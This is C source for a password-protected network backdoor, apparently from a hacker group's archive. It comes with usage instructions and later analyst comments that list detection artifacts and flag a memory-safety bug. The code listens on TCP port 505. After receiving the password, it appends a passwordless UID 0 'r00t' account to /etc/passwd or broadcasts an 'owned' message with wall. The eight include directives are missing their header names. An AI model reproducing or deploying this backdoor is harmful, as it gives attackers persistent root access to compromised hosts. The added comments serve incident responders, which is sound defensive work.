/* A rip off a sockets tutorial i found somewhere cause I didn't feel like
   writing stupid basic sockets code when I had it in my src directory
   already. */

/* Greets:
     Undernet Channels: #rootworm, #hacktech, #hyperlink, #3xposure, #legionoot
     Groups: The LegionOOT (www.legionoot.cc), Team Sploit
     People: Cyph3r, n3m0, Adoni, f0bic, d0g, khe0ps, h-S-t, F-o-X, NeonMatrix,
             Azmodan, & Venomous */

/* Usage (setup):
     # gcc -o backdoor backdoor.c
     # ./backdoor password &
   Usage (using): telnet to host (port 505) --> type the password (don't wait
   for a prompt, there isn't one so its less obvious its a backdoor) --> type
   1 or 2. And yes it's _supposed_ to disconnect you after each command. */

/*
 * Analyst summary, from the code below: a TCP listener on port 505, bound to
 * all interfaces, that forks one child per accepted connection. The child
 * searches the first data it receives for the string passed as argv[1]; on a
 * match it sends a fixed prompt, reads one reply, hands it to handle() and
 * closes the connection. handle() appends a UID 0 record with an empty
 * password field to /etc/passwd and/or runs wall with a fixed message.
 *
 * Artifacts a responder can look for on a host: a listener on TCP/505; the
 * shared secret in clear text in the process's argument list; the literal
 * prompt text in the binary and on the wire; a "r00t" record appended to
 * /etc/passwd; the wall broadcast text. Binding a port below 1024 and writing
 * /etc/passwd normally both need root, so the program was presumably started
 * by someone who already held root on the host.
 */

/* NOTE(review): the eight header names after #include were lost when this
   page was extracted; the directives are left exactly as found. */
#include
#include
#include
#include
#include
#include
#include
#include

#define PORT 505        /* TCP port the listener binds */
#define MAXDATASIZE 100 /* size of the receive buffer in main() */
#define BACKLOG 10      /* backlog argument passed to listen() */

void handle(char *command);

/*
 * main - start the listener and serve connections until the process is killed.
 * argv[1] is the shared secret a client must send; any other argument count
 * prints a usage line to stderr and exits with status 1. Failure of socket(),
 * bind() or listen() is reported with perror() and also exits with status 1.
 */
int main(int argc, char *argv[]) {
    int sockfd, new_fd, sin_size, numbytes;
    char *bytes;
    struct sockaddr_in my_addr;
    struct sockaddr_in their_addr;
    char buf[MAXDATASIZE];
    /* Fixed prompt, sent only after the secret has matched. The text is
       constant, so it works as a string signature for the binary and as a
       content signature for the session. (The line break inside the literal
       is how the page stores it.) */
    char ask[]="Enter Command (1 to put r00t::0:0:... 
in /etc/passwd, 2 to send '7h1s b0x 1s 0wn3d' to all people on the box: ";

    if (argc != 2) {
        fprintf(stderr,"Usage: %s password\n", argv[0]);
        exit(1);
    }

    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
        perror("socket");
        exit(1);
    }

    /* INADDR_ANY: the listener accepts connections on every local address. */
    my_addr.sin_family = AF_INET;
    my_addr.sin_port = htons(PORT);
    my_addr.sin_addr.s_addr = INADDR_ANY;

    if (bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr)) == -1) {
        perror("bind");
        exit(1);
    }

    if (listen(sockfd, BACKLOG) == -1) {
        perror("listen");
        exit(1);
    }

    while(1) { /* main accept() loop */
        sin_size = sizeof(struct sockaddr_in);
        if ((new_fd = accept(sockfd, (struct sockaddr *)&their_addr, &sin_size)) == -1) {
            perror("accept");
            continue;
        }
        /* The converted peer address is discarded: the program keeps no
           record of who connected, so connection evidence has to come from
           network or host telemetry. */
        inet_ntoa(their_addr.sin_addr);
        if (!fork()) {
            /* Child process: one connection, then exit. Nothing is sent
               before the secret arrives, so a plain connect to the port
               returns no banner. */
            /* NOTE(review): this recv's result is discarded and buf is not
               terminated before strstr reads it. */
            recv(new_fd, buf, MAXDATASIZE, 0);
            /* Substring match: the secret only has to appear somewhere in
               the received data. */
            bytes = strstr(buf, argv[1]);
            if (bytes != NULL){
                /* sizeof(ask) counts the terminating NUL, so that byte is
                   sent along with the prompt text. */
                send(new_fd, ask, sizeof(ask), 0);
                numbytes=recv(new_fd, buf, MAXDATASIZE, 0);
                /* NOTE(review): recv's result is used as an index with no
                   range check; -1 and MAXDATASIZE both fall outside buf, so
                   this network-facing code is itself memory-unsafe. */
                buf[numbytes] = '\0';
                handle(buf);
            }
            close(new_fd);
            exit(0);
        }
        /* Parent: drop its copy of the connection and reap finished children
           without blocking. */
        close(new_fd);
        while(waitpid(-1,NULL,WNOHANG) > 0); /* clean up child processes */
    }
}

/*
 * handle - act on the reply read after the secret matched.
 * command: NUL-terminated reply text.
 *
 * Matching is by substring and the two checks are independent: a reply
 * containing "1" triggers the /etc/passwd append, a reply containing "2"
 * triggers wall, and a reply containing both triggers both.
 */
void handle(char *command) {
    FILE *fle;

    if(strstr(command, "1") != NULL) {
        /* Appends an account record with an empty password field and
           UID/GID 0. No newline is written after it, which affects how the
           record appears at the end of the file. File-integrity monitoring
           on /etc/passwd and an audit for extra UID 0 or empty-password
           accounts both surface this change. */
        fle = fopen("/etc/passwd", "a+");
        fprintf(fle, "r00t::0:0:r00t:/root:/bin/bash");
        fclose(fle);
    }
    if(strstr(command, "2") != NULL) {
        /* Runs wall through the shell with a fixed message; the command
           string is constant and takes nothing from the client. */
        system("wall 7h1s b0x 1s 0wn3d");
    }
}